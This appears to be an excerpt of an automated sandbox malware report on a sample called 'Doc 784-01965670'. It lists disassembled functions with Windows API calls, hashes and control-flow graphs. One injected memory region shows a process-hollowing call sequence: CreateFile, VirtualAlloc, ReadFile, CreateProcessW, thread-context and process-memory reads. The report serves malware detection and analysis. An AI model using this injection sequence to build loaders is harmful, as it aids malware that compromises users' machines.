                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
                                                                                                                                    • String ID: Line:
                                                                                                                                    • API String ID: 1620655955-1585850449
                                                                                                                                    • Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                                                                    • Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
                                                                                                                                    • Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                                                                    • Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B
                                                                                                                                    Function 004103E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 445 4103e0-410461 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                    APIs
                                                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$CreateShow
                                                                                                                                    • String ID: AutoIt v3$edit
                                                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                                                    • Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                                                                    • Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
                                                                                                                                    • Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                                                                                    • Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C
                                                                                                                                    Function 03F94400 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 140fileCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 446 3f94400-3f9451b call 3f92050 call 3f942f0 CreateFileW 453 3f9451d 446->453 454 3f94522-3f94532 446->454 455 3f945d2-3f945d7 453->455 457 3f94539-3f94553 VirtualAlloc 454->457 458 3f94534 454->458 459 3f94555 457->459 460 3f94557-3f9456e ReadFile 457->460 458->455 459->455 461 3f94570 460->461 462 3f94572-3f945ac call 3f94330 call 3f932f0 460->462 461->455 467 3f945c8-3f945d0 ExitProcess 462->467 468 3f945ae-3f945c3 call 3f94380 462->468 467->455 468->467
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 03F942F0: Sleep.KERNELBASE(000001F4), ref: 03F94301
                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03F94511
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2063970183.0000000003F92000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F92000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_3f92000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFileSleep
                                                                                                                                    • String ID: S7HPVC2RXH9B
                                                                                                                                    • API String ID: 2694422964-3321098165
                                                                                                                                    • Opcode ID: 8288c0d9c08d87133da1f821957407058f5527ac6ef57f073f9f39ab8b08d097
                                                                                                                                    • Instruction ID: 7c1d20e412a6e5b28ea0043ed71389b5d8579bd00842b603623c5349bcb166e7
                                                                                                                                    • Opcode Fuzzy Hash: 8288c0d9c08d87133da1f821957407058f5527ac6ef57f073f9f39ab8b08d097
                                                                                                                                    • Instruction Fuzzy Hash: 01514071D14249EAFF10DBE4C814BEFBB79AF58300F1041A9E609BB2C0DA791B45CBA5
                                                                                                                                    Function 00413A88 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 470 413a88-413a99 call 41718c 473 413b10-413b15 call 4171d1 470->473 474 413a9b-413aa2 470->474 475 413aa4-413abc call 418407 call 419f6d 474->475 476 413ae7 474->476 487 413ac7-413ad7 call 413ade 475->487 488 413abe-413ac6 call 419f9d 475->488 479 413ae8-413af8 RtlFreeHeap 476->479 479->473 481 413afa-413b0f call 417f23 GetLastError call 417ee1 479->481 481->473 487->473 495 413ad9-413adc 487->495 488->487 495->479
                                                                                                                                    APIs
                                                                                                                                    • __lock.LIBCMT ref: 00413AA6
                                                                                                                                      • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
                                                                                                                                      • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
                                                                                                                                      • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
                                                                                                                                    • ___sbh_find_block.LIBCMT ref: 00413AB1
                                                                                                                                    • ___sbh_free_block.LIBCMT ref: 00413AC0
                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                                                                                                    • GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2714421763-0
                                                                                                                                    • Opcode ID: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                                                                                    • Instruction ID: 54fb22c17cbd059cfb8714ef359fce415cc636064f476ff80f42ef981757bf49
                                                                                                                                    • Opcode Fuzzy Hash: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                                                                                    • Instruction Fuzzy Hash: 7401A731A08301BADF206F71AC09BDF3B64AF00759F10052FF544A6182DB7D9AC19B9C
                                                                                                                                    Function 0040F5E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
                                                                                                                                      • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
                                                                                                                                      • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC
                                                                                                                                    • _strcat.LIBCMT ref: 0040F603
                                                                                                                                      • Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8
                                                                                                                                      • Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
                                                                                                                                    • String ID: HH
                                                                                                                                    • API String ID: 1194219731-2761332787
                                                                                                                                    • Opcode ID: ee47fd20779ff5886c3c730aa44a1efa7791f275b5868e90dcef310a8da63108
                                                                                                                                    • Instruction ID: 1fd31f67f6889806bd2ce24d6488871f5ee50ddf162d20410a363c4a19aba518
                                                                                                                                    • Opcode Fuzzy Hash: ee47fd20779ff5886c3c730aa44a1efa7791f275b5868e90dcef310a8da63108
                                                                                                                                    • Instruction Fuzzy Hash: 022158B260825067C724EF7A9C8266EF7D8AF85308F148C3FF554D2282F638D555879A
                                                                                                                                    Function 03F932F0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 03F93AAB
                                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03F93B41
                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03F93B63
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2063970183.0000000003F92000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F92000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_3f92000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2438371351-0
                                                                                                                                    • Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                                                                                    • Instruction ID: b4a77a0e33eaf46ec3184ac1fd953500e63d958a6844fa6b8d80e76e39947ef7
                                                                                                                                    • Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                                                                                    • Instruction Fuzzy Hash: 0E622D34A14218DBEB24DFA4C850BDEB376EF58300F1091AAD10DEB394E7799E85CB59
                                                                                                                                    Function 0040E1E0 Relevance: 6.1, APIs: 4, Instructions: 82windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 0040E202
                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: IconNotifyShell__memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 928536360-0
                                                                                                                                    • Opcode ID: 27b28fb85d639681eb8fd2a3c2bcd9dc0bb82ef5f5c365fc5a47124cd6911170
                                                                                                                                    • Instruction ID: 9c6d99eda8392314e00a4319cd3b9f491a6d528882fc0aac3328a2d60ab56ec1
                                                                                                                                    • Opcode Fuzzy Hash: 27b28fb85d639681eb8fd2a3c2bcd9dc0bb82ef5f5c365fc5a47124cd6911170
                                                                                                                                    • Instruction Fuzzy Hash: FC318170608701DFD320DF25D845B97BBF8BB45304F00486EE99A93380E778A958CF5A
                                                                                                                                    Function 0041171A Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _malloc.LIBCMT ref: 00411734
                                                                                                                                      • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                                                                      • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                                                                      • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                                                                    • std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                      • Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC
                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1411284514-0
                                                                                                                                    • Opcode ID: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                                                                                    • Instruction ID: c554e94cc15d94fff19a40754e7570613bf3612ee9c26c673f8185df9075a277
                                                                                                                                    • Opcode Fuzzy Hash: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                                                                                    • Instruction Fuzzy Hash: 6FF0E23550060A66CF08B723EC06ADE3B649F11798B10403BFA20552F2DF6DADC9865C
                                                                                                                                    Function 004734B7 Relevance: 4.7, APIs: 3, Instructions: 234COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                                                                    • Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
                                                                                                                                    • Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                                                                    • Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96
                                                                                                                                    Function 0040F110 Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
                                                                                                                                    • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
                                                                                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3677997916-0
                                                                                                                                    • Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                                                                    • Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
                                                                                                                                    • Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                                                                    • Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26
                                                                                                                                    Function 0043526E Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _malloc.LIBCMT ref: 00435278
                                                                                                                                      • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                                                                      • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                                                                      • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                                                                    • _malloc.LIBCMT ref: 00435288
                                                                                                                                    • _malloc.LIBCMT ref: 00435298
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _malloc$AllocateHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 680241177-0
                                                                                                                                    • Opcode ID: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                                                                                    • Instruction ID: 30b75876ff52ae1c35022de4a6700901ba1db26c97f4d16f7fcf584af9a5a73f
                                                                                                                                    • Opcode Fuzzy Hash: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                                                                                    • Instruction Fuzzy Hash: E5F0A0B1500F0046E660AB3198457C7A2E09B14307F00186FB6855618ADA7C69C4CEAC
                                                                                                                                    Function 00401B70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _wcslen.LIBCMT ref: 00401B71
                                                                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                      • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                      • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                      • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Exception@8Throw_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                    • String ID: @EXITCODE
                                                                                                                                    • API String ID: 580348202-3436989551
                                                                                                                                    • Opcode ID: 48d001a4b96ee351bc7679959485890c1c6d832d60c6cde5ea273d4c8ab31dfe
                                                                                                                                    • Instruction ID: 288ad252d7dad0c090ff8240dee62855692e698d70424b42c0a66861a7771545
                                                                                                                                    • Opcode Fuzzy Hash: 48d001a4b96ee351bc7679959485890c1c6d832d60c6cde5ea273d4c8ab31dfe
                                                                                                                                    • Instruction Fuzzy Hash: 73F06DF2A002025BD7649B35DC0276776E4AB44704F18C83EE14AC7791F6BDE8829B15
                                                                                                                                    Function 0040EFE0 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 0040F00A
                                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 004299D9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                    • Opcode ID: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                                                                    • Instruction ID: 855a981e3d87b0586b227f36a287a9e63fe5cd358b5bfab8de368ff291d46a89
                                                                                                                                    • Opcode Fuzzy Hash: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                                                                    • Instruction Fuzzy Hash: 67011D703803107AF2311F28AD5BF5632546B44B24F244B39FBD5BE2E2D2F86885970C
                                                                                                                                    Function 0041511A Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
